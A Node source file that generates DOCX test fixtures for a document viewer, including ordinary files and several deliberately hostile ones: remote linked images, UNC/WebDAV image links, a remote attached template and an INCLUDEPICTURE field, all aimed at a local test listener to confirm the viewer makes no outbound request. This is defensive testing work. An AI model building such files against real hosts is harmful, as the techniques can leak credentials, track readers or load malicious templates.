import {
  Document, Packer, Paragraph, TextRun, HeadingLevel, Table, TableRow, TableCell, WidthType, ImageRun,
  Header, Footer, PageNumber, ExternalHyperlink, AlignmentType
} from "docx";
import { write, record, packageVersion, stableZip, officeVariants, chartPng, LISTENER, WEBDAV_UNC, SAFE_RULES, FIXED_DATE } from "./lib.mjs";

const producer = `docx ${packageVersion("docx")} (Node)`;
const licence = "Generated by this repository; no third-party content";
const pack = async doc => stableZip(await Packer.toBuffer(doc));
const meta = { creator: "Plain Viewer corpus", title: "Plain Viewer fixture", lastModifiedBy: "Plain Viewer corpus" };

export async function generateDocx() {
  // Simple
  const simple = await pack(new Document({ ...meta, sections: [{ children: [
    new Paragraph({ heading: HeadingLevel.HEADING_1, children: [new TextRun("Hello from a Word document")] }),
    new Paragraph("A one-page document with plain text, used to check that Word files open, search finds text, and copying works.")
  ] }] }));
  write("docx/simple.docx", simple);
  record({ id: "docx-simple", file: "docx/simple.docx", format: "docx", category: "simple", producer, licence,
    expect: { result: "open", pages: 1, text: ["Hello from a Word document"] }, rules: SAFE_RULES });

  // Complex: 20 pages (the performance target's "representative 20-page DOCX"), each section starting on a new page.
  const children = [];
  for (let i = 1; i <= 20; i++) {
    children.push(new Paragraph({ heading: HeadingLevel.HEADING_1, pageBreakBefore: i > 1, children: [new TextRun(i === 1 ? "Hello complex document" : `Section ${i}`)] }));
    children.push(new Paragraph(`Paragraph for section ${i}. `.repeat(8)));
    if (i === 2) children.push(new Paragraph({ children: [new TextRun({ text: "Bold", bold: true }), new TextRun(", "), new TextRun({ text: "italic", italics: true }), new TextRun(" and "), new TextRun({ text: "underlined", underline: {} }), new TextRun(" text.")] }));
    if (i === 3) children.push(new Table({ width: { size: 100, type: WidthType.PERCENTAGE }, rows: [["Region", "Q1", "Q2"], ["North", "1,200", "1,350"], ["Sindh", "1,540", "1,610"]]
      .map(r => new TableRow({ children: r.map(c => new TableCell({ children: [new Paragraph(c)] })) })) }));
    if (i === 4) children.push(new Paragraph({ children: [new ImageRun({ type: "png", data: chartPng(), transformation: { width: 360, height: 180 }, altText: { title: "Chart", description: "Four coloured bars", name: "chart" } })] }));
    if (i === 5) ["First point", "Second point", "Third point"].forEach(t => children.push(new Paragraph({ text: t, bullet: { level: 0 } })));
    if (i === 6) children.push(new Paragraph({ children: [new ExternalHyperlink({ link: `${LISTENER}/docx-complex/link`, children: [new TextRun({ text: "External link (must ask before opening)", style: "Hyperlink" })] })] }));
    if (i === 7) {
      for (const text of ["اردو: یہ ایک دستاویز ہے", "سنڌي: سلام دنيا", "العربية: مرحبا بالعالم"])
        children.push(new Paragraph({ bidirectional: true, alignment: AlignmentType.RIGHT, children: [new TextRun({ text, rightToLeft: true })] }));
      children.push(new Paragraph("中文：你好世界 · 日本語：こんにちは"));
    }
  }
  const complex = await pack(new Document({ ...meta, sections: [{
    headers: { default: new Header({ children: [new Paragraph("Plain Viewer header")] }) },
    footers: { default: new Footer({ children: [new Paragraph({ alignment: AlignmentType.CENTER, children: [new TextRun("Page "), new TextRun({ children: [PageNumber.CURRENT] }), new TextRun(" of "), new TextRun({ children: [PageNumber.TOTAL_PAGES] })] })] }) },
    children
  }] }));
  write("docx/complex-20-pages.docx", complex);
  record({ id: "docx-complex", file: "docx/complex-20-pages.docx", format: "docx", category: "complex", producer, licence,
    expect: { result: "open", pages: 20, text: ["Hello complex document", "Section 20", "سنڌي"], searchCounts: { Sindh: 1 } },
    rules: { ...SAFE_RULES, links: `${LISTENER}/docx-complex/link must only open after confirmation` } });

  // Empty document
  write("docx/empty.docx", await pack(new Document({ ...meta, sections: [{ children: [new Paragraph("")] }] })));
  record({ id: "docx-empty", file: "docx/empty.docx", format: "docx", category: "empty", producer, licence, expect: { result: "open", pages: 1 }, rules: SAFE_RULES });

  // Hostile: linked (not embedded) pictures and a remote template. A viewer must not fetch any of them.
  let pictureId = 900;
  const linkedPicture = (rid, name, id = ++pictureId) => `<w:p><w:r><w:t xml:space="preserve">Hello linked picture: </w:t></w:r><w:r><w:drawing><wp:inline distT="0" distB="0" distL="0" distR="0"><wp:extent cx="952500" cy="952500"/><wp:docPr id="${id}" name="${name}"/><a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"><a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture"><pic:nvPicPr><pic:cNvPr id="${id}" name="${name}"/><pic:cNvPicPr/></pic:nvPicPr><pic:blipFill><a:blip r:link="${rid}"/><a:stretch><a:fillRect/></a:stretch></pic:blipFill><pic:spPr><a:xfrm><a:off x="0" y="0"/><a:ext cx="952500" cy="952500"/></a:xfrm><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></pic:spPr></pic:pic></a:graphicData></a:graphic></wp:inline></w:drawing></w:r></w:p>`;
  const imageRel = (rid, target) => `<Relationship Id="${rid}" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="${target}" TargetMode="External"/>`;
  async function attack(name, edit, notes) {
    write(`docx/${name}.docx`, await stableZip(simple, edit));
    record({ id: `attack-docx-${name.replace("attack-", "")}`, file: `docx/${name}.docx`, format: "docx", category: "attack", producer: `${producer}, edited with JSZip`, licence,
      expect: { result: "open", pages: 1, text: ["Hello"] }, rules: SAFE_RULES, notes });
  }
  const addToBody = (zip, xml) => zip.file("word/document.xml").async("string").then(d => zip.file("word/document.xml", d.replace("<w:sectPr", xml + "<w:sectPr")));
  const addRel = (zip, part, rel) => zip.file(part).async("string").then(r => zip.file(part, r.replace("</Relationships>", rel + "</Relationships>")));

  await attack("attack-remote-image", async zip => {
    await addToBody(zip, linkedPicture("rIdRemote1", "remote.png"));
    await addRel(zip, "word/_rels/document.xml.rels", imageRel("rIdRemote1", `${LISTENER}/docx-remote-image/picture.png`));
  }, "Linked picture on a web address. Any request under /docx-remote-image/ is a failure.");

  await attack("attack-unc-image", async zip => {
    await addToBody(zip, linkedPicture("rIdUnc1", "unc.png"));
    await addRel(zip, "word/_rels/document.xml.rels", imageRel("rIdUnc1", `file:///${WEBDAV_UNC.replace(/\\/g, "/").replace(/^\/\//, "/")}/docx-unc-image.png`));
    await addToBody(zip, linkedPicture("rIdUnc2", "unc2.png"));
    await addRel(zip, "word/_rels/document.xml.rels", imageRel("rIdUnc2", `${WEBDAV_UNC}\\docx-unc-image2.png`));
  }, "Linked pictures on a network share (UNC and file: forms, via WebDAV on the listener port). Windows could send credentials; nothing may be contacted.");

  await attack("attack-remote-template", async zip => {
    const settings = await zip.file("word/settings.xml").async("string");
    zip.file("word/settings.xml", settings.replace(/(<w:settings[^>]*>)/, `$1<w:attachedTemplate r:id="rIdTemplate1"/>`));
    zip.file("word/_rels/settings.xml.rels", `<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rIdTemplate1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="${LISTENER}/docx-remote-template/template.dotm" TargetMode="External"/></Relationships>`);
  }, "Remote template (a known malware technique). Any request under /docx-remote-template/ is a failure.");

  await attack("attack-includepicture", async zip => {
    await addToBody(zip, `<w:p><w:r><w:t xml:space="preserve">Hello field: </w:t></w:r><w:fldSimple w:instr=" INCLUDEPICTURE &quot;${LISTENER}/docx-includepicture/field.png&quot; \\d "><w:r><w:t>[picture]</w:t></w:r></w:fldSimple></w:p>`);
  }, "INCLUDEPICTURE field pointing at the listener. Fields must not be updated on open.");

  await officeVariants({ format: "docx", folder: "docx", simple, complex, mainPart: "word/document.xml",
    macroType: "application/vnd.ms-word.document.macroEnabled.main+xml", macroExtension: "docm", producer, licence });
}
